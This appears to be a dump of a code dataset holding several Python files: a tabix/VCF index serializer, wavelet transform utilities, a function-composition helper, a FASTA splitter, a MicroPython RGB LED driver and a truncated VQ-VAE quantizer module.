max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
tabixpy/_io.py | bejobioinformatics/tabixpy | 3 | 12795651 | <gh_stars>1-10
import gzip
import json
import struct
import hashlib
from ._logger import logger, getLogLevel
from ._gzip import GZIP_MAGIC
from ._consts import (
COMPRESS,
)
from ._consts import (
TABIX_EXTENSION,
)
from ._consts import (
TABIXPY_FORMAT_NAME,
TABIXPY_FORMAT_VER,
TABIXPY_EXTENSION
)
from ._consts import (
VCFBGZ_FORMAT_VER,
VCFBGZ_FORMAT_NAME,
VCFBGZ_EXTENSION,
VCFBGZ_EOF
)
BIN_SIZES = [
[ 0, 2** 8, 'B' ], # char 1
[ -2** 7, 2** 7, 'b' ], # char 1
[ 0, 2**16, 'H' ], # short unsigned 2
[ -2**15, 2**15, 'h' ], # short 2
[ 0, 2**32, 'L' ], # long unsigned 4
[ -2**31, 2**31, 'l' ], # long 4
[ 0, 2**64, 'Q' ], # long long unsigned 8
[ -2**63, 2**63, 'q' ], # long long 8
]
def getByteSize(vals):
for (min_val, max_val, code) in BIN_SIZES:
if all([x >= min_val and x < max_val for x in vals]):
return code
raise ValueError(f"not able to encode values {vals}")
def genStructValueGetter(fhd, returnBytes=False):
def getValues(fmt):
fmt_s = struct.calcsize(fmt)
pack = fhd.read(fmt_s)
res = struct.unpack(fmt, pack)
if returnBytes:
return res, pack
else:
return res
return getValues
def getFilenames(infile):
if infile[-3:] == '.gz' or infile[-4:] == '.bgz':
ingz = infile
else:
ingz = infile[:-4]
inid = infile + TABIX_EXTENSION
inbj = ingz + TABIXPY_EXTENSION
inbk = ingz + VCFBGZ_EXTENSION
assert not ingz.endswith(".")
return ingz, inid, inbj, inbk
def saveTabixPy(ingz, data, compress=COMPRESS):
data["__format_name__"] = TABIXPY_FORMAT_NAME
data["__format_ver__" ] = TABIXPY_FORMAT_VER
outfileJ = ingz + TABIXPY_EXTENSION
logger.info(f"saving {outfileJ}")
opener = open
if compress:
logger.debug("compressing")
opener = gzip.open
with opener(outfileJ, "wt") as fhd:
json.dump(data, fhd, indent=1)
def loadTabixPy(ingz):
(ingz, inid, inbj, inbk) = getFilenames(ingz)
compressed = None
with open(inbj, "rb") as fhd:
firstChars = fhd.read(2)
if firstChars[0] == 123: # { 123
compressed = False
else:
assert firstChars == GZIP_MAGIC, firstChars
compressed = True
is_compressed = "compressed json" if compressed else "json"
logger.info(f"loading {inbj} as {is_compressed}")
data = None
if compressed:
with gzip.open(inbj, "rb") as fhd:
data = json.load(fhd)
else:
with open(inbj, "rt") as fhd:
data = json.load(fhd)
assert "__format_name__" in data
assert "__format_ver__" in data
assert data["__format_name__"] == TABIXPY_FORMAT_NAME
assert data["__format_ver__" ] == TABIXPY_FORMAT_VER
return data
def saveVcfGzPy(filename, data, compress=COMPRESS):
outfile = filename + VCFBGZ_EXTENSION
logger.info(f" saving {outfile}")
flatten = lambda lst: (item for sublist in lst for item in sublist)
chromLength = data["chromLength"]
header = {
"chroms" : data["chroms"],
"numCols" : data["numCols"],
"chromSizes" : data["chromSizes"],
"chromLength": data["chromLength"]
}
headerJ = json.dumps(header)
header_fmts = [
["q" , len(VCFBGZ_FORMAT_NAME) ],
[f"{len(VCFBGZ_FORMAT_NAME)}s", VCFBGZ_FORMAT_NAME.encode() ],
["q" , VCFBGZ_FORMAT_VER ],
["q" , len(headerJ) ],
[f"{len(headerJ)}s" , headerJ.encode() ]
]
m = hashlib.sha256()
header_fmt = "<" + "".join([h[0] for h in header_fmts])
logger.debug(f"header_fmt '{header_fmt}'")
header_val = [h[1] for h in header_fmts]
header_dat = struct.pack(header_fmt, *header_val )
logger.debug(header_dat)
logger.debug(header_val)
m.update(header_dat)
if getLogLevel() == "DEBUG":
header_rev = struct.unpack(header_fmt, header_dat)
header_rev = list(header_rev)
logger.debug(header_rev)
assert header_rev == header_val
opener = open
if compress:
logger.info(" compressing")
opener = gzip.open
with opener(outfile, 'wb') as fhd:
fhd.write(header_dat)
for lstK in ["realPositions", "firstPositions", "lastPositions", "numberRows"]:
logger.info(f" writing {lstK:16s} - {chromLength:18,d}")
lst = data[lstK]
for chrom_data in lst:
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
cdsum = sum(chrom_data)
st = chrom_data[0]
chrom_data = [st] + [v - chrom_data[c] for c,v in enumerate(chrom_data[1:])]
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
fmt = getByteSize(chrom_data)
fms = f"<qc{len(chrom_data)}{fmt}"
logger.info(f" fmt {fmt} min {min(chrom_data):15,d} max {max(chrom_data):15,d} len {len(chrom_data):18,d} cdsum {cdsum:21,d} fmts {fms}")
lstD = struct.pack(fms, cdsum, fmt.encode(), *chrom_data)
# lstD = struct.pack(f"<{len(chrom_data)}q" , *chrom_data)
fhd.write(lstD)
m.update(lstD)
# sys.exit(0)
# lstD = struct.pack(f"<{chromLength}q" , *flatten(lst))
# fhd.write(lstD)
# m.update(lstD)
digestHex = m.hexdigest()
digestLen = len(digestHex)
digestSize = struct.pack(f"<q", digestLen)
m.update(digestSize)
fhd.write(digestSize)
digestHex = m.hexdigest()
digest = struct.pack(f"<{digestLen}s", digestHex.encode())
fhd.write(digest)
logger.info(digestHex)
fhd.write(VCFBGZ_EOF)
return
def loadVcfGzPy(filename):
indexFile = filename + VCFBGZ_EXTENSION
logger.info(f" loading {indexFile}")
m = hashlib.sha256()
compressed = None
with open(indexFile, "rb") as fhd:
firstChars = fhd.read( 8 + len(VCFBGZ_FORMAT_NAME) )
compressed = None
if firstChars[:2] == GZIP_MAGIC:
compressed = True
else:
fmt = firstChars[8:]
try:
fmt = fmt.decode()
except:
raise ValueError(f"not a valid uncompressed file. invalid magic header: {fmt}. expected {GZIP_MAGIC} OR {VCFBGZ_FORMAT_NAME}")
if fmt == VCFBGZ_FORMAT_NAME:
compressed = False
else:
raise ValueError(f"not a valid uncompressed file. invalid magic header: {fmt}. expected {GZIP_MAGIC} OR {VCFBGZ_FORMAT_NAME}")
if compressed is None:
raise ValueError(f"not a valid uncompressed file. invalid magic header: {fmt}. expected {GZIP_MAGIC} OR {VCFBGZ_FORMAT_NAME}")
opener = open
if compressed:
logger.info(" decompressing")
opener = gzip.open
with opener(indexFile, 'rb') as fhd:
getter = genStructValueGetter(fhd, returnBytes=True)
((fmt_len, ), d) = getter("<q")
m.update(d)
logger.debug(f" fmt_len {fmt_len}")
assert fmt_len == len(VCFBGZ_FORMAT_NAME), f"fmt_len {fmt_len} == len(VCFBGZ_FORMAT_NAME) {len(VCFBGZ_FORMAT_NAME)}"
((fmt_nam, ), d) = getter(f"<{fmt_len}s")
m.update(d)
fmt_nam = fmt_nam.decode()
logger.debug(f" fmt_nam {fmt_nam}")
assert fmt_nam == VCFBGZ_FORMAT_NAME, f"fmt_nam {fmt_nam} == VCFBGZ_FORMAT_NAME {VCFBGZ_FORMAT_NAME}"
((fmt_ver, ), d) = getter("<q")
m.update(d)
logger.debug(f" fmt_ver {fmt_ver}")
assert fmt_ver == VCFBGZ_FORMAT_VER, f"fmt_ver {fmt_ver} == VCFBGZ_FORMAT_VER {VCFBGZ_FORMAT_VER}"
((lenHeaderJ, ), d) = getter("<q")
m.update(d)
logger.debug(f" lenHeaderJ {lenHeaderJ}")
((headerJ, ), d) = getter(f"<{lenHeaderJ}s")
m.update(d)
headerJ = headerJ.decode()
header = json.loads(headerJ)
logger.debug(f" header {header}")
chromLength = header["chromLength"]
for lstK in ["realPositions", "firstPositions", "lastPositions", "numberRows"]:
logger.info(f" reading {lstK}")
header[lstK] = []
for chromSize in header["chromSizes"]:
logger.info(f" {chromSize:12,d} values")
((cdsum,), d) = getter(f"<q")
m.update(d)
((fmt,), d) = getter(f"<c")
m.update(d)
# logger.info(f"cdsum {cdsum} fmt {fmt}")
(chrom_data, d) = getter(f"<{chromSize}{fmt.decode()}")
m.update(d)
chrom_data = list(chrom_data)
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
for c in range(1,len(chrom_data)):
chrom_data[c] = chrom_data[c] + chrom_data[c-1]
# logger.info(f"chrom_data {chrom_data[:10]} {chrom_data[-10:]}")
if cdsum == 0: #pypy
assert sum(chrom_data) == -1, f"sum(chrom_data) {sum(chrom_data)} == cdsum {cdsum}"
else:
assert sum(chrom_data) == cdsum, f"sum(chrom_data) {sum(chrom_data)} == cdsum {cdsum}"
header[lstK].append(chrom_data)
((digestLen, ), d) = getter("<q")
m.update(d)
logger.debug(f"digestLen {digestLen}")
((digestHex, ), _) = getter(f"<{digestLen}s")
digestHex = digestHex.decode()
logger.info(f"digestHex {digestHex}")
assert digestHex == m.hexdigest()
eof = fhd.read(len(VCFBGZ_EOF))
assert eof == VCFBGZ_EOF
assert len(fhd.read()) == 0
return header
| 2.15625 | 2 |
analyze/wavelet/base.py | ivanovwaltz/wavelet_sound_microscope | 0 | 12795652 | <filename>analyze/wavelet/base.py
from functools import partial
from itertools import chain, tee
import logging
import numpy as np
log = logging.getLogger(__name__)
PI2 = 2 * np.pi
def pairwise(iterable):
one, two = tee(iterable)
next(two, None)
return zip(one, two)
def grouper(iterable, n):
return zip(*([iter(iterable)] * n))
def test_split_vertical():
i, j = split_vertical([[1, 2], [3, 4]])
assert i.tolist() == [[1], [3]]
assert j.tolist() == [[2], [4]]
def split_vertical(mat):
mat = np.asarray(mat)
half = mat.shape[1] / 2
return mat[:, :half], mat[:, half:]
def test_iconcatenate_pairs():
pairs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
assert [list(r) for r in iconcatenate_pairs(pairs)] == \
[
[1, 2, 3, 4, 5, 6],
[4, 5, 6, 7, 8, 9],
]
def iconcatenate_pairs(items):
for pair in pairwise(items):
yield np.concatenate(pair)
def is_power_of_two(val):
return val and val & (val - 1) == 0
def gen_halfs(arrays, size):
halfsize = size // 2
for array in arrays:
pair = split_array(array, halfsize)
for j in filter(len, pair):
yield j
def test_gen_halfs():
d = [ [1,2,3,4], [5,6,7], ]
assert list(gen_halfs(d, 4)) == [[1, 2], [3, 4], [5, 6], [7]]
def split_array(array, where):
return array[:where], array[where:]
def map_only_last(fn, iterable):
items = iter(iterable)
last = next(items)
for elem in items:
yield last
last = elem
yield fn(last)
def test_map_only_last():
mapped = map_only_last(lambda x: x+1, range(3))
assert list(mapped) == [0, 1, 3]
class NumpyPadder(object):
def __init__(self, size):
self.size = size
def __call__(self, array):
self.original_size = len(array)
self.pad_size = self.size - self.original_size
if self.pad_size == 0:
return array
elif self.pad_size > 0:
return np.pad(array, (0, self.pad_size), 'constant')
assert False # Should never come here
raise Exception('Pad size < 0')
class BaseWaveletBox(object):
def __init__(self, nsamples, samplerate, scale_resolution, omega0):
if not is_power_of_two(nsamples):
raise Exception(u'nsamples must be power of two')
self.nsamples = nsamples
self.omega0 = omega0
self.scales = autoscales(nsamples, samplerate,
scale_resolution, omega0)
self.angular_frequencies = angularfreq(nsamples, samplerate)
@property
def frequencies(self):
# Set coefficient in accordance with wavelet type
return 11 * (self.omega0 / 70) / self.scales
def sound_apply_cwt(self, sound, progressbar, **kwargs):
blocks = sound.get_blocks(self.nsamples)
# blocks = sound.get_blocks(self.nsamples//2)
with progressbar(blocks) as blocks_:
return self._apply_cwt(blocks_, progressbar, **kwargs)
def _apply_cwt(self, blocks, progressbar, decimate, **kwargs):
half_nsamples = self.nsamples // 2
chunks = gen_halfs(blocks, self.nsamples)
padder = NumpyPadder(half_nsamples)
equal_sized_pieces = map_only_last(padder, chunks)
zero_pad = np.zeros(half_nsamples)
overlapped_blocks = iconcatenate_pairs(
chain([zero_pad], equal_sized_pieces, [zero_pad])
)
windowed_pieces = overlapped_blocks * np.hanning(self.nsamples)
complex_images = [
self.cwt(windowed_piece, decimate, **kwargs)
for windowed_piece in windowed_pieces
]
halfs = chain.from_iterable(map(split_vertical, complex_images))
next(halfs)
overlapped_halfs = [left + right for left, right in grouper(halfs, 2)]
# Cut pad size from last
last_image_size = padder.original_size // decimate
overlapped_halfs[-1] = overlapped_halfs[-1][:, :last_image_size]
return np.concatenate(overlapped_halfs, axis=1)
def angularfreq(nsamples, samplerate):
""" Compute angular frequencies """
angfreq = np.arange(nsamples, dtype=np.float32)
angfreq[-nsamples/2 + 1:] -= nsamples
angfreq *= samplerate * PI2 / nsamples
return angfreq
# Чем больше, тем больше октав снизу будет отброшено
LOWER_FQ_LIMIT_COEFF = 0.5
def autoscales(samples_count, samplerate, scale_resolution, omega0):
""" Compute scales as fractional power of two """
# morle_samples - количество отсчетов для базового вейвлета
morle_samples = (omega0 + np.sqrt(2 + omega0 ** 2)) / PI2
# scale - измеряется в секундах
minimal_scale = morle_samples / samplerate
# сколько базовых вейвлетов поместится (диапазон частот)
freq_interval = samples_count / morle_samples
skip_n_lower_octaves = LOWER_FQ_LIMIT_COEFF * samples_count / samplerate
skipped_low_freq_interval = max(1, 2**skip_n_lower_octaves)
visible_freq_interval = freq_interval / skipped_low_freq_interval
maximal_scale = np.log2(visible_freq_interval)
indexes_count = int(np.floor(maximal_scale / scale_resolution))
indexes = np.arange(indexes_count + 1, dtype=np.float32)
logarithmic_indexes = 2 ** (indexes * scale_resolution)
return minimal_scale * logarithmic_indexes
| 2.65625 | 3 |
melody.py | phinate/melody | 0 | 12795653 | import functools
import inspect
import equinox
from typing import Callable, Iterable
def compose(workflow: Iterable[Callable], do_jit: bool=False) -> Callable:
def pipeline(*args, **kwargs): # *args are for grad, **kwargs are the rest
res = dict([])
for f in workflow:
sig = inspect.signature(f)
f_args = sig.parameters.keys()
feed_args = False
feed_kwargs = False
arglist = []
for arg in f_args:
if not feed_args or not feed_kwargs:
if arg in kwargs.keys() and arg not in res.keys():
feed_kwargs = True
arglist.append(arg)
elif arg not in kwargs.keys() and arg not in res.keys():
feed_args = True
elif arg in kwargs.keys() and arg in res.keys():
raise Exception(f'the keyword \'{arg}\' is already specified in the workflow')
else:
break
f_kwargs = {k:kwargs[k] for k in arglist}
if feed_args and feed_kwargs:
res = f(*args, **res, **f_kwargs)
elif feed_args and not feed_kwargs:
res = f(*args, **res)
elif not feed_args and feed_kwargs:
res = f(**res, **f_kwargs)
else:
res = f(**res)
return res
# not really too helpful, since can't parse which of these are free params...
workflow_pars = []
for i, f in enumerate(workflow):
sig = inspect.signature(f)
workflow_pars += list(sig.parameters.values())
workflow_pars = sorted(workflow_pars, key=lambda x: 0 if x.default is inspect.Parameter.empty else 1)
# print(workflow_pars)
last_sig = inspect.signature(workflow[-1])
an = last_sig.return_annotation
pipeline.__signature__ = inspect.Signature(workflow_pars, return_annotation=an)
if do_jit:
return equinox.filter_jit(
pipeline,
filter_spec=equinox.is_array,
filter_spec_return=equinox.is_array
)
else:
return pipeline
| 2.25 | 2 |
tools/splitfasta/split_fasta.py | pavanvidem/galaxytools | 0 | 12795654 | <gh_stars>0
#!/usr/bin/env python
import os
import sys
from Bio import SeqIO
num_chunks = 0
if len(sys.argv) == 3:
num_chunks = int(sys.argv[2])
input_filename = sys.argv[1]
elif len(sys.argv) == 2:
input_filename = sys.argv[1]
else:
exit("Usage: split_fasta.py <input_filename> [<num_chunks>]")
os.mkdir("splits")
if num_chunks != 0:
# if splitting into chunks we need to count how many records are in the
# input file
record_count = 0
with open(input_filename) as input_file:
for line in input_file:
if line.lstrip().startswith(">"):
record_count += 1
records_per_chunk = round(float(record_count) / num_chunks)
count = 1
with open(input_filename) as input_file:
chunk_record_count = 0 # how many lines have we written to the output file
records = []
for record in SeqIO.parse(input_file, "fasta"):
records.append(record)
if num_chunks == 0 or (
count < num_chunks and len(records) >= records_per_chunk
):
if num_chunks == 0:
output_filename = os.path.join("splits", record.id)
else:
output_filename = os.path.join("splits", "part{}".format(count))
SeqIO.write(records, output_filename, "fasta")
count += 1
records = []
if records:
# this only applies for the mode where input file is
# split into chunks
output_filename = os.path.join("splits", "part{}".format(count))
SeqIO.write(records, output_filename, "fasta")
| 3.296875 | 3 |
RGBLed_lib.py | sonmezarda/RGB-LED-Library | 0 | 12795655 | <filename>RGBLed_lib.py
#rgb led lib
from machine import PWM, Pin
import utime
def convert(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) // (in_max - in_min) + out_min
class RGBLed:
anode = 'anode'
cathode = 'cathode'
def __init__(self, red_pin, green_pin, blue_pin, ledType, currentValueR = 0, currentValueG = 0, currentValueB=0):
self.red_pin = red_pin
self.green_pin = green_pin
self.blue_pin = blue_pin
self.ledType = ledType
self.currentValueR = currentValueR
self.currentValueG = currentValueG
self.currentValueB = currentValueB
self.Set(currentValueR,currentValueG,currentValueB)
def show(self):
print("Red Pin:", self.red_pin)
print("Green Pin:", self.green_pin)
print("Blue Pin:", self.blue_pin)
print("Led Type:",self.ledType)
print("Current Red Value:",self.currentValueR)
print("Current Green Value:",self.currentValueG)
print("Current Blue Value:",self.currentValueB)
def setColor(self,r,g,b):
if self.ledType == 'anode':
self.currentValueR = r
self.currentValueG = g
self.currentValueB = b
r = convert(r,0,255,65534,0)
g = convert(g,0,255,65534,0)
b = convert(b,0,255,65534,0)
red_pin_pwm = PWM(Pin(self.red_pin))
green_pin_pwm = PWM(Pin(self.green_pin))
blue_pin_pwm = PWM(Pin(self.blue_pin))
red_pin_pwm.duty_u16(r)
green_pin_pwm.duty_u16(g)
blue_pin_pwm.duty_u16(b)
elif self.ledType == 'cathode':
self.currentValueR = r
self.currentValueG = g
self.currentValueB = b
r = convert(r,0,255,0,65534)
g = convert(g,0,255,0,65534)
b = convert(b,0,255,0,65534)
red_pin_pwm = PWM(Pin(self.red_pin))
green_pin_pwm = PWM(Pin(self.green_pin))
blue_pin_pwm = PWM(Pin(self.blue_pin))
red_pin_pwm.duty_u16(r)
green_pin_pwm.duty_u16(g)
blue_pin_pwm.duty_u16(b)
def off(self):
self.setColor(0,0,0)
def white(self):
self.setColor(255,255,255)
def yellow(self):
self.setColor(255,255,0)
def magenta(self):
self.setColor(255,0,255)
def cyan(self):
self.setColor(0,255,255)
def slowSet(self,r,g,b,delay = 0.01):
if r>self.currentValueR:
rStep = 1
else:
rStep -= 1
if g>self.currentValueG:
gStep = 1
else:
gStep = -1
if b>self.currentValueB:
bStep = 1
else:
bStep = -1
if self.ledType == 'anode':
for i in range(self.currentValueR,r,rStep):
x = convert(i,0,255,65534,0)
red_pin_pwm = PWM(Pin(self.red_pin))
red_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueG,g,gStep):
x = convert(i,0,255,65534,0)
green_pin_pwm = PWM(Pin(self.green_pin))
green_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueB,b,bStep):
x = convert(i,0,255,65534,0)
blue_pin_pwm = PWM(Pin(self.blue_pin))
blue_pin_pwm.duty_u16(x)
utime.sleep(delay)
elif self.ledType == 'cathode':
for i in range(self.currentValueR,r,rStep):
x = convert(i,0,255,0,65534)
red_pin_pwm = PWM(Pin(self.red_pin))
red_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueG,g,gStep):
x = convert(i,0,255,0,65534)
green_pin_pwm = PWM(Pin(self.green_pin))
green_pin_pwm.duty_u16(x)
utime.sleep(delay)
for i in range(self.currentValueB,b,bStep):
x = convert(i,0,255,0,65534)
blue_pin_pwm = PWM(Pin(self.blue_pin))
blue_pin_pwm.duty_u16(x)
utime.sleep(delay)
self.currentValueR = r
self.currentValueG = g
self.currentValueB = b
self.Set(r,g,b)
| 3.421875 | 3 |
local/model_vqvae.py | blackbawx/SILA-Switching_Identificationy_by_Latent_Articulation | 1 | 12795656 | <filename>local/model_vqvae.py<gh_stars>1-10
import os, sys
FALCON_DIR = os.environ.get('FALCONDIR')
sys.path.append(FALCON_DIR)
from models import *
from layers import *
from util import *
from model import *
class quantizer_kotha_arff(nn.Module):
"""
Input: (B, T, n_channels, vec_len) numeric tensor n_channels == 1 usually
Output: (B, T, n_channels, vec_len) numeric tensor
"""
def __init__(self, n_channels, n_classes, vec_len, normalize=False, scale=None, assistant=None):
super().__init__()
if normalize:
target_scale = scale if scale is not None else 0.06
self.embedding_scale = target_scale
self.normalize_scale = target_scale
else:
self.embedding_scale = 1e-3 #1e-3
self.normalize_scale = None
self.embedding0_2classes = nn.Parameter(torch.randn(n_channels, 2, vec_len, requires_grad=True) * self.embedding_scale)
self.embedding0_3classes = nn.Parameter(torch.randn(n_channels, 3, vec_len, requires_grad=True) * self.embedding_scale)
self.embedding0_4classes = nn.Parameter(torch.randn(n_channels, 4, vec_len, requires_grad=True) * self.embedding_scale)
self.embedding0_nclasses = nn.Parameter(torch.randn(n_channels, 16, vec_len, requires_grad=True) * self.embedding_scale)
self.offset = torch.arange(n_channels).cuda() * n_classes
# self.offset: (n_channels) long tensor
self.n_classes = n_classes
self.after_update()
self.plot_histogram = 0
self.assistant = assistant
def forward(self, x0, chunk_size=512):
fig = None
if self.normalize_scale:
target_norm = self.normalize_scale * math.sqrt(x0.size(3))
x = target_norm * x0 / x0.norm(dim=3, keepdim=True)
embedding_2classes = target_norm * self.embedding0_2classes / self.embedding0_2classes.norm(dim=2, keepdim=True)
embedding_3classes = target_norm * self.embedding0_3classes / self.embedding0_3classes.norm(dim=2, keepdim=True)
embedding_4classes = target_norm * self.embedding0_4classes / self.embedding0_4classes.norm(dim=2, keepdim=True)
embedding_nclasses = target_norm * self.embedding0_nclasses / self.embedding0_nclasses.norm(dim=2, keepdim=True)
else:
x = x0
embedding_2classes = self.embedding0_2classes
embedding_3classes = self.embedding0_3classes
embedding_4classes = self.embedding0_4classes
embedding_nclasses = self.embedding0_nclasses
#logger.log(f'std[x] = {x.std()}')
x1 = x.reshape(x.size(0) * x.size(1), x.size(2), 1, x.size(3))
# x1: (N*samples, n_channels, 1, vec_len) numeric tensor
#print("Shape of x1 and embedding: ", x1.shape, embedding.shape)
# Perform chunking to avoid overflowing GPU RAM.
index_chunks_2classes = []
index_chunks_3classes = []
index_chunks_4classes = []
index_chunks_nclasses = []
for x1_chunk in x1.split(chunk_size, dim=0):
#print("Shapes of x1_chunk, embedding_2classes, embedding_3classes and embedding_4classes: ", x1_chunk[:,:,:,:63].shape, embedding_2classes.shape, embedding_3classes.shape, embedding_4classes.shape)
index_chunks_2classes.append((x1_chunk[:, :,:, 0:64] - embedding_2classes).norm(dim=3).argmin(dim=2))
index_chunks_3classes.append((x1_chunk[:, :,:,64:128] - embedding_3classes).norm(dim=3).argmin(dim=2))
index_chunks_4classes.append((x1_chunk[:,:,:,128:192] - embedding_4classes).norm(dim=3).argmin(dim=2))
index_chunks_nclasses.append((x1_chunk[:,:,:,192:256] - embedding_nclasses).norm(dim=3).argmin(dim=2))
index_2classes = torch.cat(index_chunks_2classes, dim=0)
index_3classes = torch.cat(index_chunks_3classes, dim=0)
index_4classes = torch.cat(index_chunks_4classes, dim=0)
index_nclasses = torch.cat(index_chunks_nclasses, dim=0)
# index: (N*samples, n_channels) long tensor
hist_2classes = index_2classes.float().cpu().histc(bins=2, min=-0.5, max=1.5)
hist_3classes = index_3classes.float().cpu().histc(bins=3, min=-0.5, max=2.5)
hist_4classes = index_4classes.float().cpu().histc(bins=4, min=-0.5, max=3.5)
hist_nclasses = index_nclasses.float().cpu().histc(bins=64, min=-0.5, max=3.5)
if self.plot_histogram:
assert self.assistant is not None
hists = hist_2classes.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(2) / 2)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_2classes', fig)
hists = hist_3classes.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(3) / 3)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_3classes', fig)
plt.close()
hists = hist_4classes.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(4) / 4)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_4classes', fig)
plt.close()
hists = hist_nclasses.cpu().numpy()
fig = plt.figure()
# https://stackoverflow.com/questions/51473993/plot-an-histogram-with-y-axis-as-percentage-using-funcformatter
plt.hist(hists, weights=np.ones(64) / 64)
plt.gca().yaxis.set_major_formatter(PercentFormatter(1))
self.assistant.log_image('latent_histograms_nclasses', fig)
plt.close()
self.plot_histogram = 0
prob_2classes = hist_2classes.masked_select(hist_2classes > 0) / len(index_2classes)
entropy_2classes = - (prob_2classes * prob_2classes.log()).sum().item()
prob_3classes = hist_3classes.masked_select(hist_3classes > 0) / len(index_3classes)
entropy_3classes = - (prob_3classes * prob_3classes.log()).sum().item()
prob_4classes = hist_4classes.masked_select(hist_4classes > 0) / len(index_4classes)
entropy_4classes = - (prob_4classes * prob_4classes.log()).sum().item()
prob_nclasses = hist_nclasses.masked_select(hist_nclasses > 0) / len(index_nclasses)
entropy_nclasses = - (prob_nclasses * prob_nclasses.log()).sum().item()
index1_2classes = (index_2classes + self.offset).view(index_2classes.size(0) * index_2classes.size(1))
index1_3classes = (index_3classes + self.offset).view(index_3classes.size(0) * index_3classes.size(1))
index1_4classes = (index_4classes + self.offset).view(index_4classes.size(0) * index_4classes.size(1))
index1_nclasses = (index_nclasses + self.offset).view(index_nclasses.size(0) * index_nclasses.size(1))
# index1: (N*samples*n_channels) long tensor
output_flat_2classes = embedding_2classes.view(-1, embedding_2classes.size(2)).index_select(dim=0, index=index1_2classes)
output_flat_3classes = embedding_3classes.view(-1, embedding_3classes.size(2)).index_select(dim=0, index=index1_3classes)
output_flat_4classes = embedding_4classes.view(-1, embedding_4classes.size(2)).index_select(dim=0, index=index1_4classes)
output_flat_nclasses = embedding_nclasses.view(-1, embedding_nclasses.size(2)).index_select(dim=0, index=index1_nclasses)
# output_flat: (N*samples*n_channels, vec_len) numeric tensor
output_2classes = output_flat_2classes.view(x.shape[0], x.shape[1], x.shape[2], -1)
output_3classes = output_flat_3classes.view(x.shape[0], x.shape[1], x.shape[2], -1)
output_4classes = output_flat_4classes.view(x.shape[0], x.shape[1], x.shape[2], -1)
output_nclasses = output_flat_nclasses.view(x.shape[0], x.shape[1], x.shape[2], -1)
output = torch.cat([output_2classes, output_3classes, output_4classes, output_nclasses], dim=-1)
#print("Shape of output and x: ", output.shape, x.shape, output_2classes.shape)
out0 = (output - x).detach() + x
out1 = (x.detach() - output).float().norm(dim=3).pow(2)
out2 = (x - output.detach()).float().norm(dim=3).pow(2) + (x - x0).float().norm(dim=3).pow(2)
#logger.log(f'std[embedding0] = {self.embedding0.view(-1, embedding.size(2)).index_select(dim=0, index=index1).std()}')
return (out0, out1, out2, entropy_2classes, entropy_3classes, entropy_4classes, entropy_nclasses)
def after_update(self):
if self.normalize_scale:
with torch.no_grad():
target_norm = self.embedding_scale * math.sqrt(self.embedding0_2classes.size(2))
self.embedding0_2classes.mul_(target_norm / self.embedding0_2classes.norm(dim=2, keepdim=True))
target_norm = self.embedding_scale * math.sqrt(self.embedding0_3classes.size(2))
self.embedding0_3classes.mul_(target_norm / self.embedding0_3classes.norm(dim=2, keepdim=True))
target_norm = self.embedding_scale * math.sqrt(self.embedding0_4classes.size(2))
self.embedding0_4classes.mul_(target_norm / self.embedding0_4classes.norm(dim=2, keepdim=True))
target_norm = self.embedding_scale * math.sqrt(self.embedding0_nclasses.size(2))
self.embedding0_nclasses.mul_(target_norm / self.embedding0_nclasses.norm(dim=2, keepdim=True))
def get_quantizedindices(self, x0, chunk_size=512):
fig = None
if self.normalize_scale:
target_norm = self.normalize_scale * math.sqrt(x0.size(3))
x = target_norm * x0 / x0.norm(dim=3, keepdim=True)
embedding_2classes = target_norm * self.embedding0_2classes / self.embedding0_2classes.norm(dim=2, keepdim=True)
embedding_3classes = target_norm * self.embedding0_3classes / self.embedding0_3classes.norm(dim=2, keepdim=True)
embedding_4classes = target_norm * self.embedding0_4classes / self.embedding0_4classes.norm(dim=2, keepdim=True)
embedding_nclasses = target_norm * self.embedding0_nclasses / self.embedding0_nclasses.norm(dim=2, keepdim=True)
else:
x = x0
embedding_2classes = self.embedding0_2classes
embedding_3classes = self.embedding0_3classes
embedding_4classes = self.embedding0_4classes
embedding_nclasses = self.embedding0_nclasses
#logger.log(f'std[x] = {x.std()}')
x1 = x.reshape(x.size(0) * x.size(1), x.size(2), 1, x.size(3))
# x1: (N*samples, n_channels, 1, vec_len) numeric tensor
#print("Shape of x1 and embedding: ", x1.shape, embedding.shape)
# Perform chunking to avoid overflowing GPU RAM.
index_chunks_2classes = []
index_chunks_3classes = []
index_chunks_4classes = []
index_chunks_nclasses = []
for x1_chunk in x1.split(chunk_size, dim=0):
#print("Shapes of x1_chunk, embedding_2classes, embedding_3classes and embedding_4classes: ", x1_chunk[:,:,:,:63].shape, embedding_2classes.shape, embedding_3classes.shape, embedding_4classes$
index_chunks_2classes.append((x1_chunk[:, :,:, 0:64] - embedding_2classes).norm(dim=3).argmin(dim=2))
index_chunks_3classes.append((x1_chunk[:, :,:,64:128] - embedding_3classes).norm(dim=3).argmin(dim=2))
index_chunks_4classes.append((x1_chunk[:,:,:,128:192] - embedding_4classes).norm(dim=3).argmin(dim=2))
index_chunks_nclasses.append((x1_chunk[:,:,:,192:256] - embedding_nclasses).norm(dim=3).argmin(dim=2))
index_2classes = torch.cat(index_chunks_2classes, dim=0)
